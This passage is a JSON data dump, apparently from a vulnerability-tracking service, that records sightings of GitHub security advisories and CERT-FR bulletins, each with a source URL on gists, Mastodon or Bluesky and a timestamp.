"author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5mg8-w23w-74h3", "type": "seen", "source": "https://gist.github.com/safer-bot/83d91599672399ce0def1e7af790f1b1", "content": "", "creation_timestamp": "2025-07-16T07:30:01.000000Z"}, {"uuid": "7e2d3537-070a-4e33-826e-f4b198e63965", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7g45-4rm6-3mm3", "type": "seen", "source": "https://gist.github.com/safer-bot/83d91599672399ce0def1e7af790f1b1", "content": "", "creation_timestamp": "2025-07-16T07:30:01.000000Z"}, {"uuid": "af9b1ade-0510-4297-aad7-989a873c7e39", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2qrg-x229-3v8q", "type": "seen", "source": "https://gist.github.com/safer-bot/886c55d451a39a81c4d002ee918f1abe", "content": "", "creation_timestamp": "2025-07-16T12:04:21.000000Z"}, {"uuid": "1d6ca51e-28ec-453f-b9b2-0812fe56a1db", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-pj3v-9cm8-gvj8", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114393533525785086", "content": "", "creation_timestamp": "2025-04-24T14:59:58.830363Z"}, {"uuid": "d3bb57f3-b97b-4eb3-ab2a-411917bc3332", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2jh5-g5ch-43q5", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114394506142543507", "content": "", "creation_timestamp": "2025-04-24T19:07:20.524635Z"}, {"uuid": "2c781d81-0b80-4e13-9363-ecdec5dbdab7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-vqfr-h8mv-ghfj", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114394512917622666", "content": "", "creation_timestamp": "2025-04-24T19:09:03.187283Z"}, {"uuid": "0c9d04d3-d062-491c-8a16-8d2a5d1b6fbe", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-cpj6-fhp6-mr6j", "type": "seen", "source": "https://bsky.app/profile/azu.bsky.social/post/3lnozraetzy2h", "content": "", "creation_timestamp": "2025-04-26T05:43:33.613040Z"}, {"uuid": "f4a88fbd-65f9-45cc-b5cb-39090b3c4738", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7g45-4rm6-3mm3", "type": "seen", "source": "https://gist.github.com/safer-bot/18772d4db7c1d108730e9247a2c0554b", "content": "", "creation_timestamp": "2025-07-16T07:45:04.000000Z"}, {"uuid": "7514d9cc-2324-48cb-9c40-9d3c52e6e2c2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-rhgr-952r-6p8q", "type": "seen", "source": "https://gist.github.com/safer-bot/18772d4db7c1d108730e9247a2c0554b", "content": "", "creation_timestamp": "2025-07-16T07:45:04.000000Z"}, {"uuid": "16608873-aeaf-4830-8184-b5b525ab0da7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2f88-5hg8-9x2x", "type": "seen", "source": "https://gist.github.com/safer-bot/18772d4db7c1d108730e9247a2c0554b", "content": "", "creation_timestamp": "2025-07-16T07:45:04.000000Z"}, {"uuid": "af37e2f7-516f-4a7e-83e0-f9a5f7edf24c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-gwrp-pvrq-jmwv", "type": "seen", "source": "https://gist.github.com/safer-bot/24d871f5d5a1f1f569b4afc0326e41b9", "content": "", "creation_timestamp": "2025-07-16T12:14:34.000000Z"}, {"uuid": "50ff35d3-d68c-4e18-9cd3-56dd805f3480", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7g45-4rm6-3mm3", "type": "seen", "source": "https://gist.github.com/safer-bot/24d871f5d5a1f1f569b4afc0326e41b9", "content": "", "creation_timestamp": "2025-07-16T12:14:34.000000Z"}, {"uuid": "11099bce-634a-4a59-8626-df81aac7a968", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-pfh2-hfmq-phg5", "type": "seen", "source": "https://gist.github.com/safer-bot/309b2c3514c96b866281e3349bccea4d", "content": "", "creation_timestamp": "2025-07-16T13:21:10.000000Z"}, {"uuid": "934c1b73-fb94-45cd-a2ca-6b4774cd284c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-735f-pc8j-v9w8", "type": "seen", "source": "https://gist.github.com/safer-bot/7ddb036557afbccff4b128b5c0cf2325", "content": "", "creation_timestamp": "2025-07-16T14:01:42.000000Z"}, {"uuid": "4a869f33-be32-48c6-88a6-834907e967eb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-wc4r-xq3c-5cf3", "type": "seen", "source": "https://gist.github.com/safer-bot/227b935768f4907b3da218450ed38465", "content": "", "creation_timestamp": "2025-06-17T13:11:06.000000Z"}, {"uuid": "39a51162-2a34-48d7-a9bf-8c5981963e09", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-pq2g-wx69-c263", "type": "seen", "source": "https://gist.github.com/safer-bot/227b935768f4907b3da218450ed38465", "content": "", "creation_timestamp": "2025-06-17T13:11:06.000000Z"}, {"uuid": "0ba8911e-535d-4fbd-a9e5-a546404d899a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-h3gc-qfqq-6h8f", "type": "seen", "source": "https://gist.github.com/safer-bot/227b935768f4907b3da218450ed38465", "content": "", "creation_timestamp": "2025-06-17T13:11:06.000000Z"}, {"uuid": "540f73fc-afe4-45e7-9008-a3453007c2cd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6r3c-xf4w-jxjm", "type": "seen", "source": "https://gist.github.com/safer-bot/227b935768f4907b3da218450ed38465", "content": "", "creation_timestamp": "2025-06-17T13:11:06.000000Z"}, {"uuid": "e1e14569-f68c-491a-b4c9-14c0dbddc1bf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-wf8f-6423-gfxg", "type": "seen", "source": "https://gist.github.com/safer-bot/227b935768f4907b3da218450ed38465", "content": "", "creation_timestamp": "2025-06-17T13:11:06.000000Z"}, {"uuid": "21de524b-c83d-4c59-a0e1-14a0328cb38c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-hq9p-pm7w-8p54", "type": "seen", "source": "https://gist.github.com/safer-bot/227b935768f4907b3da218450ed38465", "content": "", "creation_timestamp": "2025-06-17T13:11:06.000000Z"}, {"uuid": "8b4dc35d-6725-4d5b-a363-87ddc0521229", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-24wv-6c99-f843", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114716930881228437", "content": "", "creation_timestamp": "2025-06-20T17:44:10.731484Z"}, {"uuid": "44303629-5694-4100-8b28-65b6069932d7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7899-w6c4-vqc4", "type": "seen", "source": "https://bsky.app/profile/saschanaz.sekai.social.ap.brid.gy/post/3lsqo6pifoap2", "content": "", "creation_timestamp": "2025-06-29T12:32:03.627531Z"}, {"uuid": "7acb8907-78c7-481a-82a9-b944e461638c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-735f-pc8j-v9w8", "type": "seen", "source": "https://gist.github.com/safer-bot/ef436e86b0754e088500571855bb0c22", "content": "", "creation_timestamp": "2025-07-07T03:46:51.000000Z"}, {"uuid": "6d041a8a-90a8-424d-b434-3f0feffcbdce", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-m44j-cfrm-g8qc", "type": "seen", "source": "https://gist.github.com/safer-bot/ef436e86b0754e088500571855bb0c22", "content": "", "creation_timestamp": "2025-07-07T03:46:51.000000Z"}, {"uuid": "4a688ae0-d59a-45dc-9396-8ebc8317833e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-f3gw-9ww9-jmc3", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114410089366436743", "content": "", "creation_timestamp": "2025-04-27T13:10:21.190091Z"}, {"uuid": "647e2408-d29a-4d14-a622-364f8fc8817b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-cqj8-47ch-rvvq", "type": "seen", "source": "https://gist.github.com/safer-bot/ef436e86b0754e088500571855bb0c22", "content": "", "creation_timestamp": "2025-07-07T03:46:51.000000Z"}, {"uuid": "e7f34e5e-d5e5-43cf-8ccc-a3334649c19c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-m6vm-37g8-gqvh", "type": "seen", "source": "https://gist.github.com/safer-bot/77d94a9af1e1eb4557c057300da0a0ec", "content": "", "creation_timestamp": "2025-07-16T07:57:46.000000Z"}, {"uuid": "0093db3f-a5d7-4818-b484-17675f543980", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8xfc-gm6g-vgpv", "type": "seen", "source": "https://gist.github.com/safer-bot/ef436e86b0754e088500571855bb0c22", "content": "", "creation_timestamp": "2025-07-07T03:46:51.000000Z"}, {"uuid": "c7a54f64-363b-4157-aa0a-e1abf3537bb4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-wrvw-hg22-4m67", "type": "seen", "source": "https://gist.github.com/safer-bot/77d94a9af1e1eb4557c057300da0a0ec", "content": "", "creation_timestamp": "2025-07-16T07:57:46.000000Z"}, {"uuid": "7b8c1e7d-2720-4a53-8ff9-4b6b948bb834", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4h8f-2wvx-gg5w", "type": "seen", "source": "https://gist.github.com/safer-bot/ef436e86b0754e088500571855bb0c22", "content": "", "creation_timestamp": "2025-07-07T03:46:51.000000Z"}, {"uuid": "b5982000-3cb3-4111-8e8a-b2c19ce0df6c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2qrg-x229-3v8q", "type": "seen", "source": "https://gist.github.com/safer-bot/616a8b85e998ab57bb1c3128b073777f", "content": "", "creation_timestamp": "2025-07-16T07:47:33.000000Z"}, {"uuid": "30d56735-8aff-410b-bed6-d1e64abe2142", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-269g-pwp5-87pp", "type": "seen", "source": "https://gist.github.com/safer-bot/616a8b85e998ab57bb1c3128b073777f", "content": "", "creation_timestamp": "2025-07-16T07:47:33.000000Z"}, {"uuid": "535c056e-5f00-4717-9c3e-47a51633c80d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-65fg-84f6-3jq3", "type": "seen", "source": "https://gist.github.com/safer-bot/616a8b85e998ab57bb1c3128b073777f", "content": "", "creation_timestamp": "2025-07-16T07:47:33.000000Z"}, {"uuid": "7fa37b46-2de4-4c16-8d9a-74e0696b1cb3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-fp5r-v3w9-4333", "type": "seen", "source": "https://gist.github.com/safer-bot/616a8b85e998ab57bb1c3128b073777f", "content": "", "creation_timestamp": "2025-07-16T07:47:33.000000Z"}, {"uuid": "8fee62bc-fedd-4cea-8651-54aa50d68d4c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-rc2q-x9mf-w3vf", "type": "seen", "source": "https://gist.github.com/safer-bot/616a8b85e998ab57bb1c3128b073777f", "content": "", "creation_timestamp": "2025-07-16T07:47:33.000000Z"}, {"uuid": "156ec839-2df1-4e0d-aa5c-119bc7ba02af", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-v435-xc8x-wvr9", "type": "seen", "source": "https://gist.github.com/safer-bot/ef436e86b0754e088500571855bb0c22", "content": "", "creation_timestamp": "2025-07-07T03:46:51.000000Z"}, {"uuid": "02f348c3-954a-4504-aff8-ad78a8b1936c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-w33c-445m-f8w7", "type": "seen", "source": "https://gist.github.com/safer-bot/ef436e86b0754e088500571855bb0c22", "content": "", "creation_timestamp": "2025-07-07T03:46:51.000000Z"}, {"uuid": "55aa60e7-b200-4d8a-b9d9-4499b444058e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-rgv9-q543-rqg4", "type": "seen", "source": "https://gist.github.com/safer-bot/af7e61eb3a938373c366e78d6a205d47", "content": "", "creation_timestamp": "2025-06-17T12:59:37.000000Z"}, {"uuid": "615530bd-f98e-4078-b724-75dcfc79f40c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-jjjh-jjxp-wpff", "type": "seen", "source": "https://gist.github.com/safer-bot/af7e61eb3a938373c366e78d6a205d47", "content": "", "creation_timestamp": "2025-06-17T12:59:37.000000Z"}, {"uuid": "325eb306-e1bd-49e5-8119-00f7405524b8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-57j2-w4cx-62h2", "type": "seen", "source": "https://gist.github.com/safer-bot/af7e61eb3a938373c366e78d6a205d47", "content": "", "creation_timestamp": "2025-06-17T12:59:37.000000Z"}, {"uuid": "1f8709e8-c6fe-4309-8791-3f704931a31d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6phf-6h5g-97j2", "type": "seen", "source": "https://gist.github.com/safer-bot/af7e61eb3a938373c366e78d6a205d47", "content": "", "creation_timestamp": "2025-06-17T12:59:37.000000Z"}, {"uuid": "ff53df90-acc3-496e-bc1c-7728328abedd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-qh8g-58pp-2wxh", "type": "seen", "source": "https://gist.github.com/safer-bot/ef436e86b0754e088500571855bb0c22", "content": "", "creation_timestamp": "2025-07-07T03:46:51.000000Z"}, {"uuid": "4a6e093b-f7c3-438d-8bee-5d9f6af4f283", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-g8m5-722r-8whq", "type": "seen", "source": "https://gist.github.com/safer-bot/ef436e86b0754e088500571855bb0c22", "content": "", "creation_timestamp": "2025-07-07T03:46:51.000000Z"}, {"uuid": "bd1e39d2-8495-4502-aef4-516824e40594", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2025-ACT-018", "type": "seen", "source": "https://bsky.app/profile/cert-fr.bsky.social/post/3lnutv7hr4w2z", "content": "", "creation_timestamp": "2025-04-28T13:14:22.480763Z"}, {"uuid": "cba255d0-a91f-46a2-a622-0dc52f427828", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2025-ACT-018", "type": "seen", "source": "https://social.numerique.gouv.fr/users/cert_fr/statuses/114415767474159253", "content": "", "creation_timestamp": "2025-04-28T13:14:23.762776Z"}, {"uuid": "938aa2d0-e9b1-41cb-abec-057b02a9a6ad", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2025-ACT-018", "type": "seen", "source": "https://bsky.app/profile/infosecfr.skyfleet.blue/post/3lnv2nnhm2g2u", "content": "", "creation_timestamp": "2025-04-28T15:15:24.859791Z"}, {"uuid": "d82680fa-5aad-449d-adf0-bde89de9eef4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2025-ALE-005", "type": "seen", "source": "https://social.numerique.gouv.fr/users/cert_fr/statuses/114416362646401517", "content": "", "creation_timestamp": "2025-04-28T15:45:45.030498Z"}, {"uuid": "b99ec41f-96f1-4a63-b1bb-b60b3a2f4c8b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2025-ALE-005", "type": "seen", "source": "https://bsky.app/profile/cti-news.bsky.social/post/3lnv62epobw2x", "content": "", "creation_timestamp": "2025-04-28T16:16:13.401452Z"}, {"uuid": "c561d238-827f-45af-b9b1-37ca68e5a301", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-qh8g-58pp-2wxh", "type": "seen", "source": "https://gist.github.com/safer-bot/18f4abbe002522f658a3388a00f97cb0", "content": "", "creation_timestamp": "2025-07-07T04:21:35.000000Z"}, {"uuid": "c93e7517-5153-4f2d-94f7-921eac670b1b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-cqj8-47ch-rvvq", "type": "seen", "source": "https://gist.github.com/safer-bot/18f4abbe002522f658a3388a00f97cb0", "content": "", "creation_timestamp": "2025-07-07T04:21:35.000000Z"}, {"uuid": "b4f04846-6f0a-4c9e-a1cc-85b0ae499ccf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-g8m5-722r-8whq", "type": "seen", "source": "https://gist.github.com/safer-bot/18f4abbe002522f658a3388a00f97cb0", "content": "", "creation_timestamp": "2025-07-07T04:21:35.000000Z"}, {"uuid": "cf52a6ad-3009-4c5a-ac33-c830a0ea587d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-wxqc-pxw9-g2p8", "type": "seen", "source": "https://gist.github.com/safer-bot/36f2ef37d36eb5a3075f945a07663c8f", "content": "", "creation_timestamp": "2025-07-16T03:12:09.000000Z"}, {"uuid": "de3fdd20-526f-4991-981b-b3ae36b86fd8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9cmq-m9j5-mvww", "type": "seen", "source": "https://gist.github.com/safer-bot/36f2ef37d36eb5a3075f945a07663c8f", "content": "", "creation_timestamp": "2025-07-16T03:12:09.000000Z"}, {"uuid": "8a06bea6-265d-4785-8daf-4c3c005498e6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-r4q3-7g4q-x89m", "type": "seen", "source": "https://gist.github.com/safer-bot/36f2ef37d36eb5a3075f945a07663c8f", "content": "", "creation_timestamp": "2025-07-16T03:12:09.000000Z"}, {"uuid": "bbb7c444-a1ac-4c43-81f3-de1a34f5985f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-xf96-w227-r7c4", "type": "seen", "source": "https://gist.github.com/safer-bot/36f2ef37d36eb5a3075f945a07663c8f", "content": "", "creation_timestamp": "2025-07-16T03:12:09.000000Z"}, {"uuid": "06bfc87a-1836-4205-bd7d-411313eb7da9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4gc7-5j7h-4qph", "type": "seen", "source": "https://gist.github.com/safer-bot/36f2ef37d36eb5a3075f945a07663c8f", "content": "", "creation_timestamp": "2025-07-16T03:12:09.000000Z"}, {"uuid": "6bc67d37-29ad-4a3a-a89d-e439050cece4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-564r-hj7v-mcr5", "type": "seen", "source": "https://gist.github.com/safer-bot/36f2ef37d36eb5a3075f945a07663c8f", "content": "", "creation_timestamp": "2025-07-16T03:12:09.000000Z"}, {"uuid": "ef357243-dfba-411e-94d7-2bb0d5199d4d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4wp7-92pw-q264", "type": "seen", "source": "https://gist.github.com/safer-bot/36f2ef37d36eb5a3075f945a07663c8f", "content": "", "creation_timestamp": "2025-07-16T03:12:09.000000Z"}, {"uuid": "26ad1f0a-4d10-4c2f-b403-770c00d406e0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-596c-w2jc-jmmx", "type": "seen", "source": "https://infosec.exchange/users/DarkWebInformer/statuses/114717782317996763", "content": "", "creation_timestamp": "2025-06-20T21:20:43.306296Z"}, {"uuid": "b476a6fd-1e99-49de-ab8b-7b0a850ac913", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-hgqp-3mmf-7h8f", "type": "seen", "source": "https://s.ovalerio.net/users/dethos/statuses/114737341599049362", "content": "", "creation_timestamp": "2025-06-24T08:15:26.665503Z"}, {"uuid": "d735aff9-fd5f-43ec-843c-59d3b5c13666", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-rc42-6c7j-7h5r", "type": "seen", "source": "https://gist.github.com/safer-bot/36f2ef37d36eb5a3075f945a07663c8f", "content": "", "creation_timestamp": "2025-07-16T03:12:09.000000Z"}, {"uuid": "ebe7c980-829f-485a-94bd-84b335498ce0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-jjjh-jjxp-wpff", "type": "seen", "source": "https://gist.github.com/safer-bot/ea116f5a6c0fdd46a9183269ae2c32dc", "content": "", "creation_timestamp": "2025-07-16T08:18:18.000000Z"}, {"uuid": "dd3a9fdd-5f84-41eb-a568-8f38e8596117", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-mvr2-9pj6-7w5j", "type": "seen", "source": "https://gist.github.com/safer-bot/ea116f5a6c0fdd46a9183269ae2c32dc", "content": "", "creation_timestamp": "2025-07-16T08:18:18.000000Z"}, {"uuid": "214810cb-1327-4477-8552-d1504a309164", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-57j2-w4cx-62h2", "type": "seen", "source": "https://gist.github.com/safer-bot/ea116f5a6c0fdd46a9183269ae2c32dc", "content": "", "creation_timestamp": "2025-07-16T08:18:18.000000Z"}, {"uuid": "431260d8-fd89-4ae1-8a8f-62e85f38dad0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5mg8-w23w-74h3", "type": "seen", "source": "https://gist.github.com/safer-bot/e07299b156b0622cfe6705b4fd5b84a1", "content": "", "creation_timestamp": "2025-07-16T12:35:26.000000Z"}, {"uuid": "697159a8-5fee-40f0-a3b4-c141da7f1dc7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2qp4-g3q3-f92w", "type": "seen", "source": "https://gist.github.com/safer-bot/e07299b156b0622cfe6705b4fd5b84a1", "content": "", "creation_timestamp": "2025-07-16T12:35:26.000000Z"}, {"uuid": "05ea1926-62a7-4449-8267-c911c3f177ba", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-mvr2-9pj6-7w5j", "type": "seen", "source": "https://gist.github.com/safer-bot/e07299b156b0622cfe6705b4fd5b84a1", "content": "", "creation_timestamp": "2025-07-16T12:35:26.000000Z"}, {"uuid": "23a412dc-86d8-4cfa-8dd1-677eacb6ed4e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2qp4-g3q3-f92w", "type": "seen", "source": "https://gist.github.com/safer-bot/8ba867f6a247f7fa05740decb00edc7e", "content": "", "creation_timestamp": "2025-07-07T04:37:27.000000Z"}, {"uuid": "50486f9d-ef97-4b36-a702-00c9de84f0af", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4h8f-2wvx-gg5w", "type": "seen", "source": "https://gist.github.com/safer-bot/8ba867f6a247f7fa05740decb00edc7e", "content": "", "creation_timestamp": "2025-07-07T04:37:27.000000Z"}, {"uuid": "53c8d67d-dd5d-483c-87b1-52160b386e4e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-vrpq-qp53-qv56", "type": "seen", "source": "https://gist.github.com/safer-bot/48d4d415e550f60b744171da16b87501", "content": "", "creation_timestamp": "2025-07-16T03:12:53.000000Z"}, {"uuid": "db13deec-386d-45ec-9ac1-a9c96ba59c64", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-gwrp-pvrq-jmwv", "type": "seen", "source": "https://gist.github.com/safer-bot/48d4d415e550f60b744171da16b87501", "content": "", "creation_timestamp": "2025-07-16T03:12:53.000000Z"}, {"uuid": "39532ad1-786c-4c4e-b891-dd328586fc51", 